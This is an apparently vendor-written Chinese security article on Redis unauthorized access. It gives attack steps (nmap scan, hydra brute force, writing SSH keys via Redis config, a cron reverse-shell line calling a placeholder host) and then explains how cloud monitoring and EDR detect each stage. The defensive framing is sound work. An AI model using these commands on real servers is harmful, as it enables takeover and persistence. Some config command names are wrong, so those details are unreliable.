Redis未授權訪問漏洞介紹

　　1、Redis應用介紹

　　Redis是key-value數據庫，一般企業級使用場景為內部查詢緩存。支持的value值包括string、list、set、zset和hash，為了保證效率，數據都是緩存在內存中，當然redis會周期性的把更新數據寫入到磁盤或者吧修改操作寫入追加的記錄文件，并且在此基礎上實現了master-slave同步。

　　2、Redis未授權訪問漏洞概述

　　Redis因配置不當導致未授權訪問（Redis綁定6379端口沒有開啟認證（默認配置）），被黑客利用，形成嚴重的威脅事件。利用手段：在特定條件下，如果Redis以root權限運行，黑客可以寫入SSH公鑰文件，從而直接通過SSH登錄。導致數據庫泄密或者勒索事件的發送，嚴重威脅我們的業務服務器安全。

黑客自動化weapon攻擊流程

　　3、攻擊手段

　　·獲取服務器開放端口信息

　　Nmap -A -p 6379 -script redis-info x.x.x.x

　　·安裝redis的python訪客包模擬client訪問服務器

　　·如果密碼不為空的情況下使用hydra暴力破解。

　　·寫入SSH公鑰，獲得操作權限

　　(1)首先在C&C服務器上生成自己的公鑰 ssh-keygen -t rsa

　　(2)將公鑰導入都C2key.txt文件

　　(3)通過修改數據庫默認路徑為root/.ssh和默認的緩沖文件authorized.keys把緩沖數據寫入到文件中，這樣就可以生成一個授權的key。

　　Config set mypath /root/.ssh

　　Config set myname authorized.keys

　　(4)最重要的一點，搞完之后要隱藏攻擊路徑?；謴驮O置

　　·寫入反彈shell

　　set yyy "\n\n* /1 /bin/bash -i>&/dev/tcp/x.x.x.x/5678 0>&1\n\n"

　　Config set mypath /var/spool/cron

　　Config set myname root

　　當然可以直接寫入挖礦程序、webshell、勒索軟件、DDoS攻擊程序等攻擊手段

　　云態勢感知如何發現

　　1、態勢感知產品發現手段

　　·Redis未授權掃描行為研判

　　在掃描流量進入到公有云中心的時候，我們需要對Flow流數據做數據聚類分析，因為自動化攻擊程序一般偶讀是掃描批量掃描6739端口。把來自同一IP或者同一時間段的入網數據流做聚類分析，很容易發現過濾。同時配合多源威脅情報系統，把掃描集群IP篩選出來。產生確定的告警行為。

　　·redis暴力破解行為研判

　　通過傳統網絡入侵檢測系統可以通過連接頻率判定暴力破解行為。

　　·redis弱口令

　　我們可以站在防御者視角對自己的Redis服務器做數據基線掃描

　　網絡層面基線掃描（使用肉口令字典判斷）

　　主機層面EDR產品掃描（配置文件檢查項）

　　·反彈shell檢測

　　通過EDR程序上報服務器上的對外連接，同時結合威脅情報系統數據，形成對外可疑連接告警事件，

　　·挖礦程序

　　可以通過云沙箱方式把相關數據上傳到沙箱中運行，形成惡意文件下載事件。

　　·對外DDoS

　　這是一種肉雞行為，通過ET規則可以監控到對外發包特征。形成對外DDoS告警事件。

　　·勒索軟件

　　可以通過云沙箱方式把相關數據上傳到沙箱中運行，形成惡意文件下載告警事件。

　　2、攻擊鏈分析

　　經過以上檢測引擎發現的告警事件，我們可以把整個入侵過程串聯起來，形成攻擊鏈

　　總結

　　攻擊鏈分析，是我們呈現給用戶最有用的入侵證據鏈，當然這些需要有安全運營人員更好的自動化編排系統，把發現的入侵手段，融入到我們安全運營平臺中。同時通過紅藍對抗的方式驗證其效果。

責任編輯：韓希宇